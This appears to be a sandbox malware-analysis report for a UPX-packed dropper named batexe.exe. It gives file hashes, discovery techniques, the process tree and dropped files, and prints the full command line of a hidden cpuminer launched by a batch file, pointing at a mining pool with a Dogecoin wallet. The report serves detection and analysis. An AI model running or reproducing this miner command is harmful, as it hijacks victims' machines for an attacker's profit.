73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
302s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 02:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3636	b2e.exe
3536	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3536	cpuminer-sse2.exe
3536	cpuminer-sse2.exe
3536	cpuminer-sse2.exe
3536	cpuminer-sse2.exe
3536	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2308-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2308 wrote to memory of 3636	2308	batexe.exe	88
PID 2308 wrote to memory of 3636	2308	batexe.exe	88
PID 2308 wrote to memory of 3636	2308	batexe.exe	88
PID 3636 wrote to memory of 1588	3636	b2e.exe	89
PID 3636 wrote to memory of 1588	3636	b2e.exe	89
PID 3636 wrote to memory of 1588	3636	b2e.exe	89
PID 1588 wrote to memory of 3536	1588	cmd.exe	92
PID 1588 wrote to memory of 3536	1588	cmd.exe	92

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2308
- C:\Users\Admin\AppData\Local\Temp\DF15.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\DF15.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\DF15.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E5CC.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\DF15.tmp\b2e.exe

Filesize
10.2MB

MD5
4f71280096ff55d518b13e9cfa7d21ae

SHA1
74cdd75d299ca208d22e8ae84b53b8b8dfeb2d70

SHA256
77f9f9ef6fa07a57bc7b5ccf5783b62b0a1ce0f54de195947f2967790cf38eef

SHA512
cee3b1637e47c824721907e3a54bbe0726d5b354245d83bd323324d3b376b9d8a1950d48ad675c29a8206f8464382cefb48266a3fb2701021a147b30ebd6105b

Download Submit
C:\Users\Admin\AppData\Local\Temp\DF15.tmp\b2e.exe

Filesize
4.2MB

MD5
dfdf0227e776a9059478a8eacaf4d3e9

SHA1
006c393c747210c4bb2b4052e67e2f6435a68792

SHA256
99c08058510b25c890610d204c822242f4e2dcd6fc3320841cd84af6b6e8057c

SHA512
d71e969baadd0fa69461fdcba61b3942610a749f0b6c5c26af3e5db59911419d67d65f9ca6774c31a938f5ef4f0501f7503e1cc7403a6ba2b75a74743ad0f8f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\DF15.tmp\b2e.exe

Filesize
3.6MB

MD5
928d16ea8250ad19a6d4173796013e76

SHA1
85e2af3432763b34c28c86777b8ff7bd4c4df08e

SHA256
cced14d7d99944589c909178de398740cf6687290a66c8a66ca555fb834c8544

SHA512
68523824b8c2abb3ab42ee80516fe058999dc3fd5e9cd619efed32b63a226c3608039c6baeba3a72808b7760cd362d9eb51422bb7d7a35cdf643ab398b12bbff

Download Submit
C:\Users\Admin\AppData\Local\Temp\E5CC.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
150KB

MD5
6cf219f9f320d4904282b287839f8404

SHA1
bd1ab0cf006f84597500cf1b4aa5ef934d8c9960

SHA256
b9ef565ebe206d7873cf06e1a40b567ff40d54c9cf989412a1a2193f70a2e457

SHA512
9774397c8809e76152577cbd380edb28eaa91e89dd3488ab31c020c7f42a0f8f5b5b40f25f7741248f02e730531c6008d9e72609160138a89d7ca66a7dd0d11a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.3MB

MD5
4c04147c386ba8792ac6a03069572a8a

SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a

SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
192KB

MD5
8c933a591c8d0c1fec1da393587d09c9

SHA1
65f4672c0e0a6a20436fbaba57dac8c1a5fc5e51

SHA256
c22ca427c0e65a0bb3e011afeba5244dd5a6e9c0327cfc7d15c4875083206b10

SHA512
96b84267fd9b7c5587c74e30d5f647acabbf6b09feac19784de4e046619fcae78f2e6aa98eb7f06fe13197bfd9207b9044b09d5248480421ceb23cb01d511881

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
64KB

MD5
e7317a0a343dc63f3fa3bf9ca6e93ff0

SHA1
0d48881feb76cf81fc46614bebfa3c134cada128

SHA256
277a43f17ccc4f0fba87c710212de61a41383bcb94410fa093b50ebd50347a63

SHA512
84ef51472db00cd4e90df3062a3cbc29a994c5cf470e54300d4a2f103ba8fb8279ec87b0561625ea1bccd80a7ad664c63457831b4eb919a7608099430b98a3d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
19KB

MD5
0995de709ecef4d57d1941959fd34a2b

SHA1
3a736245e74f9d241880a3d7e551ff453d6a9684

SHA256
e83a8d998846c3a10383a59d36597eaf5d8d148305f7ac2a42e73948da8c1684

SHA512
8d20ad66553c396334915270a340f313d9d240764f04a4c218ad72977442370294aa1ad5061042202b072a326435a12bb46be51766322ede9be1e84dc4badf18

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
2.9MB

MD5
8ac25f81aa66d3eee73fc189574637ae

SHA1
3e51a7055a0ae2b2eec8a19cefd7cb31e9828199

SHA256
f9e7280ed127f1f70fea116032f24d1bb5a4029ca19ce4df3d2e4253c1959ba0

SHA512
6993ae6833463630360d1c21b9ff8e7213abdbb8652f4f7a57b9dcb16cea8654c6931cea898dbe9a97a33c1ff137aaee1a8aefd72845907419f6565587917ced

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
22KB

MD5
3c8c1127d1e3db072e574965bb999131

SHA1
5eca78b9e5de01d3f985d8af268d1ec3eb55ddb9

SHA256
6ef38b53589d84033a9b9271e4d872032de6199f4b04c66e1beb5c480d92cd99

SHA512
ad03d04f1f2a9db21a64111ccd81ede714d360e5381916b6379a55b28c8e3048ac8bfa1d831ae531f1f47819e004e64a285bea281114a317f87d1af5a9ba3a95

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
2.5MB

MD5
3ae976c46d0c4b357e6d801ea8153d3d

SHA1
fd4fca9539fa5cfa375982f634d6d6477e6f95a1

SHA256
dfb256fa39e9edb5055ca72207ef974b19b794dfd6606c73e1e5292237138a48

SHA512
ca06e6e77102bb6dfc128071b1d2309e5372cb449f12d4970700ebe7955628bf5e6a720605f637f852da0fdbaecbc9dec0d9f50ea574d7612e9555658cad8572

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
49KB

MD5
6a30c22854e55ca1fc213b41de5ea0f2

SHA1
4589f4b1785adaffdb51e8b847d68535f8ddaf96

SHA256
9820f339ff6c6207b7363c56eb6176533188f109b642b1d6ec6b2d3443f47619

SHA512
87ab98d7aff913c3c73a2f3102f87e6a18a6fd35974fce637ec00c6595671ab3d7fee550855ea101f19db03609974654d9e0b6266926e97ca6d91935d0390de5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2308-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3536-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3536-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3536-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3536-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3536-45-0x0000000055A70000-0x0000000055B08000-memory.dmp

Filesize
608KB

Download
memory/3536-47-0x0000000001120000-0x00000000029D5000-memory.dmp

Filesize
24.7MB

Download
memory/3536-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3536-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3536-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3536-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3536-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3536-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3536-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3536-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3536-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3636-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3636-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download